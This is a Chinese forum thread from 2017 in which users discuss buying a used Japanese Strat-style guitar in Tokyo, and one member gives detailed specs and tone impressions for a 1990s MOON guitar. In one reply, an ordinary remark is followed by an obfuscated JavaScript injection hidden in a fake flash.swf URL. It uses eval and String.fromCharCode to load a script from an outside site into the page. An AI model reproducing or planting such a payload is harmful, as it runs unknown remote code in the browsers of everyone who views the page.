demooya 发表于 2017-3-7 15:01:24

懂日产st的老哥们进来聊聊

三月份去东京,这几天在疯狂功课。我的定位是买一把st,最好是hss的配置,这几天看的esp比较多,但是snapper全新着实有点贵= =,中古琴看了看大概价位在8k-1w2,不少琴成色都是A或者B+这样子,不知这个价位是否划算呢?
esp别的产品比如edwards的st个人觉得外观不如意,Navigator又没看到我中意的配置,感觉看到的sss比较多,而且价格啊哈哈哈哈,不过真的很好看;ltd类似的我只在esp的官网上看到了sn-1000,是搭配邓肯拾音器的,看着还不错,可是不知我在日本网站上检索不出来,查不到价格信息
想大家有过日本购琴经历或是对日系品牌比较了解的老哥们,给点建议或者推荐一些品牌,如果有过中古购买经历的老哥来聊一聊挑选时要注意的东西
抱拳

demooya 发表于 2017-3-7 15:05:01

demooya 发表于 2017-3-7 16:10:09

demooya 发表于 2017-3-7 16:59:15

eager 发表于 2017-3-7 19:06:15

建议楼主试试90年代中古strat款的MOON,这牌子史于1978年,是PGM旗下的高端品牌。部分早期限量款的MOON琴颈由美国WARMOTH代工,最近几年好像只做高端订制系列,现在也有自己的MB系列了。
之所以建议找90年代的中古琴,主要因为这个时期的MOON开始特别注重木料的挑选,而且中古琴的价格比较容易让人承受。15年有过一批全新订制系列,价格都折合16000人民币左右,MB系列的更贵。
我以较低的价格偶然买了一把98年限量款的中古MOON strat,身边朋友试了都说好,绝不输现在的Fender CS平均水平。

eager 发表于 2017-3-7 19:46:17

90年代美国Warmoth代工的雀眼枫琴颈,马达加斯加玫瑰木指板,美洲桤木对拼琴身,原配美国代工的无名拾音器(后来我自己换了套Lindy Fralin vintage hot套装拾音器感觉声音特别对味儿),琴颈漆面用的肯定是硝基的,琴身用的啥漆不清楚,但薄如报纸,裸琴重量3.45公斤,就知道这么多了,希望能帮到楼主。
这么细致的介绍它不是要出,只想告诉楼主90年代的MOON用了啥配置和工艺,有机会去日本应该去试试这牌子的strat。这把琴我不可能再出手。

demooya 发表于 2017-3-7 20:53:04

eager 发表于 2017-3-7 19:46
90年代美国Warmoth代工的雀眼枫琴颈,马达加斯加玫瑰木指板,美洲桤木对拼琴身,原配美国代工的无名拾音器 ...

哇nice nice!

eager 发表于 2017-3-7 21:06:54

为了以后调节指板曲度不必再拆琴颈,我自己在颈身接口处给琴颈钢筋螺丝帽位置锉了个小圆口,个人觉得这个MOD比较实用。

eager 发表于 2017-3-7 21:12:48

三个拾音器仓里面出厂时都工整地写了日文片假名,我没弄明白写的是签名还是配置名称,总之无论是用料还是做工都比较精益求精

minzhi5255 发表于 2017-3-7 21:50:30

90年代中古strat款的MOON不错,我朋友有一把,试了一下

http://localhost/flash.swf?'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'

demooya 发表于 2017-3-8 22:55:54

eager 发表于 2017-3-7 21:12
三个拾音器仓里面出厂时都工整地写了日文片假名,我没弄明白写的是签名还是配置名称,总之无论是用料还是做 ...

这琴音色风格是啥感觉 ?

eager 发表于 2017-3-9 08:56:26

这把琴是最厚的C型手感,貌似参考了一些原年1959strat的设计,但也不完全是,毕竟黑指板的原年1959strat用的是巴玫,而这把用的是马玫,中频会更多一些,原配拾音器比较含蓄,不够清澈,整琴感觉厚实粘润,相对来说更适合玩德克萨斯布鲁斯风格的过载音色。我个人并不是很喜欢德克萨斯布鲁斯的味道,但我喜欢这种厚C手感,所以我选择换了套了lindy fralin的vintage hot tall D,现在的声音属于柔中带钢的甜润味儿,而且每个音符都非常清晰,没有特别的风格倾向性。
PS:strat我喜欢用10~46的Cleartone琴弦。

demooya 发表于 2017-3-9 12:13:58

eager 发表于 2017-3-9 08:56
这把琴是最厚的C型手感,貌似参考了一些原年1959strat的设计,但也不完全是,毕竟黑指板的原年1959strat用 ...

好的,过几天去有机会摸一摸

demooya 发表于 2017-3-10 15:15:57

页: [1]
查看完整版本: 懂日产st的老哥们进来聊聊